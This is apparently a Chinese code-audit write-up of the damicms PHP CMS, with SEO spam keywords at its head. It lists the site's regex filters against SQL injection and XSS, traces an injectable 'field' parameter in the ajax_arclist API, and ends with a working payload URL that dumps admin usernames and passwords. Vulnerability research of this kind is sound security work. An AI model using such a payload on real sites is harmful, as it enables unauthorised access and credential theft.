南召网站建设,一般建设网站需要多少预算,alexa排名查询,公司企业logo设计2023年将会持续于B站、CSDN等各大平台更新#xff0c;可加入粉丝群与博主交流:838681355#xff0c;为了老板大G共同努力。
一、入口文件(单入口文件模式)
看一下Index.php文件代码#xff1a;引入了php_safe.php文件 查看一下php_safe.php防御文件#xff1a; 对变量e…2023年将会持续于B站、CSDN等各大平台更新可加入粉丝群与博主交流:838681355为了老板大G共同努力。
一、入口文件(单入口文件模式)
看一下Index.php文件代码引入了php_safe.php文件 查看一下php_safe.php防御文件 对变量errno/errno/errno/errfile/$errline用了个自定义处理函数set_error_handler做处理
做一下分析--过滤单引号
(and|or)\\b.?(|||in|like) --过滤and/or////in/like
\\/\\*.?\\*\\/ --过滤/ *
\\s*script\\b --过滤script
\\bEXEC\\b --过滤EXEC
UNION.?SELECT --过滤union select
UPDATE.?SET --过滤 update
INSERT\\sINTO.?VALUES --过滤insert into values
(SELECT|DELETE).?FROM --过滤select/delete from
HEX(\\s)?\(.?\)|IF(\\s)?\(.?\) --过滤hex编码
SLEEP(\\s)?\(.?\) --过滤sleep
USER(\\s)?\(.?\) --过滤user
(CREATE|ALTER|DROP|TRUNCATE)\\s(TABLE|DATABASE) --过滤create/alter/drop/truncate/table/database对get/post/cookie也做了处理
二、漏洞位置定位
C:\phpstudy_pro\WWW\damicms\Web\Lib\Action\ApiAction.class.php 万能获取数据接口 方法ajax_arclist中使用了REQUEST传输方式在65、69、71处有SQL交互关键变量ordor/ordor/ordor/where/num/num/num/field查看是否可控 查看一下过滤函数文件C:\phpstudy_pro\WWW\damicms\Core\Common\functions.php 防SQL 防XSS
原生SQLSELECT id,name FROM think_user limit 10
构造写法:$User-where(‘status1’)-field(‘id,name’)-order(‘id desc’)-limit(5)-select();
生成SQLSELECT id,name FROM think_user WHERE status1 order by id desc limit 5
Payloadhttp://localhost/test0/index.php?s/api/ajax_arclist/model/article/field/username,userpwd from admi_member%23